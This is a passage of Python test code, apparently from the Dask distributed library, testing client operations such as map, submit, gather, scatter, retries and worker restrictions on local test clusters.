@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert await x == 2
assert await y == 4
assert await z == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert await x == 2
assert await y == 4
with pytest.raises(ZeroDivisionError, match="eight"):
await z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 4
with pytest.raises(ZeroDivisionError, match="seven"):
await z
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
result = c.map(inc, range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(1, 101))
result = c.map(add, range(100), range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(0, 200, 2))
# mismatch shape
result = c.map(add, range(100, 200), range(10), batch_size=2)
result = await c.gather(result)
assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_custom_key_with_batches(c, s, a, b):
"""Test of <https://github.com/dask/distributed/issues/4588>"""
futs = c.map(
lambda x: x**2,
range(10),
batch_size=5,
key=[str(x) for x in range(10)],
)
assert len(futs) == 10
await wait(futs)
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
await x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
@gen_cluster(client=True)
async def test_compute_retries_annotations(c, s, a, b):
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
with dask.annotate(retries=2):
x = delayed(varying(xargs))()
y = delayed(varying(yargs))()
x, y = c.compute([x, y], optimize_graph=False)
gc.collect()
assert await x == 30
with pytest.raises(ZeroDivisionError, match="five"):
await y
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.compute([x, y, z], optimize_graph=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert await fut == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert await x == 3
@gen_cluster(client=True)
async def test_persist_retries_annotations(c, s, a, b):
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.persist([x, y, z], optimize_graph=False)
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
pd = pytest.importorskip("pandas")
x = c.submit(inc, 10)
y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
await x
await y
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
assert "int" in func(x)
assert "pandas" in func(y)
assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = await x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = await x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
await x
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(div, 1, 0)
await x.exception()
x.release()
await asyncio.sleep(0)
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = await x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await x
x = c.submit(div, 10, 2) # continues to operate
result = await x
assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
await x
assert s.tasks[x.key].who_has
x.__del__()
await async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
await c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(TimeoutError):
x.result(timeout="10 ms")
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_mismatched_client(c, s, a, b):
c2 = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
y = c2.submit(inc, 5)
with pytest.raises(ValueError, match="Futures created by another client"):
await c.gather([x, y])
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = await c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
await c.gather(futures)
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True)
async def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = await future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = await c.gather(futures)
assert result == [2]
futures = c.get({}, [], sync=False)
result = await c.gather(futures)
assert result == []
result = await c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 30
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
await c.gather(future_f)
with pytest.raises(AttributeError):
await c.gather(future_g)
await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True)
async def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
await wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
await asyncio.sleep(0)
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
await asyncio.sleep(0)
result = await z
assert result == 3
ykey = y.key
y.__del__()
await asyncio.sleep(0)
assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
[future] = await c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
await asyncio.sleep(0)
assert c.refcount[key] == 0
while key in s.tasks and s.tasks[key].who_has:
await asyncio.sleep(0.1)
@gen_cluster(client=True)
async def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = await x
xkey = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
await asyncio.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = await x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key, stimulus_id="test")
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key, stimulus_id="test")
await asyncio.sleep(0)
w = c.submit(add, y, z)
result = await w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
await wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
await asyncio.sleep(0)
w.release_key(f.key, stimulus_id="test")
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
await asyncio.sleep(0)
worker.release_key(datum.key, stimulus_id="test")
result = await c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
await wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
await wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
await wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
futures = c.get(dsk, ["y", "z"], workers=a.ip, sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert "y" in a.data
assert "z" in a.data
assert len(b.data) == 0
@gen_cluster(client=True)
async def test_restrictions_get_annotate(c, s, a, b):
x = 1
with dask.annotate(workers=a.address):
y = delayed(inc)(x)
with dask.annotate(workers=b.address):
z = delayed(inc)(y)
futures = c.get(z.__dask_graph__(), [y.key, z.key], sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert y.key in a.data
assert z.key in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
await z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True)
async def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
await wait(L)
await b.close()
assert b.address not in s.workers
result = await c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
while not (L[0].status == L[2].status == "finished"):
await asyncio.sleep(0.01)
result = await c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
async def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = await x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = await x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = await z
assert result
@gen_cluster(client=True)
async def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = await c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = await c.gather(L)
assert all(result)
@gen_cluster()
async def test_two_consecutive_clients_share_results(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = await x
f = await Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = await y
assert xx == yy
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = await c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
async def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = await c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
async def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = await c.gather(c.get(dsk, keys, sync=False))
assert list(result) == list(dask.get(dsk, keys))
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_scatter(c, s, a, b):
d = await c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = await c.gather([d["y"]])
assert yy == [20]
[x] = await c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = await c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = await z
assert result == 10 + 20
result = await c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
async def test_scatter_types(c, s, a, b):
d = await c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = await c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = await c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
async def test_scatter_non_list(c, s, a, b):
x = await c.scatter(1)
assert isinstance(x, Future)
result = await x
assert result == 1
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj:
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = await c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = await c.scatter(x)
result = await future
assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
future = await c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
x = await c.scatter(123)
y = await c.scatter(123)
assert x.key == y.key
z = await c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
async def test_scatter_hash_2(c, s, a, b):
[a] = await c.scatter([1])
[b] = await c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
import gc
gc.collect()
while c.refcount["x"]:
await asyncio.sleep(0.01)
def test_current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
await y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
await z
@gen_cluster(client=True)
async def test_get_task_prefix_states(c, s, a, b):
x = await c.submit(inc, 1)
res = s.get_task_prefix_states()
data = {
"inc": {
"erred": 0,
"memory": 1,
"processing": 0,
"released": 0,
"waiting": 0,
}
}
assert res == data
del x
while s.get_task_prefix_states() == data:
await asyncio.sleep(0.01)
res = s.get_task_prefix_states()
assert res == {}
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
[x] = await c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
await y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
await c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
await z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
await f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
results = c.map(f, lists, [total] * 10)
await wait([total])
await wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = await c.get(dsk, ("x", 0), sync=False)
y = await c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
await c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
await c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
future = await c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = await future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = await future
assert not s.counters["op"].components[0]["gather"]
result = await c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster()
async def test_scatter_direct_2(s, a, b):
c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
while s.clients[c.id].last_seen == last:
await asyncio.sleep(0.10)
await c.close()
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = await c.scatter(x, direct=True)
result = await future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
future2 = await c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = await future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
futures = await c.scatter([1, 2, 3], direct=True)
assert sorted(len(w.data) for w in workers) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = await c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
assert (
f.key in w.data and w.address in s.tasks[f.key].who_has
for f in futures
for w in workers[:3]
)
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, TimeoutError)):
await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = await c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
futures = await c.scatter([1, 2, 3])
data = await c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
await wait(L)
assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = await x.traceback()
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
try:
await c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
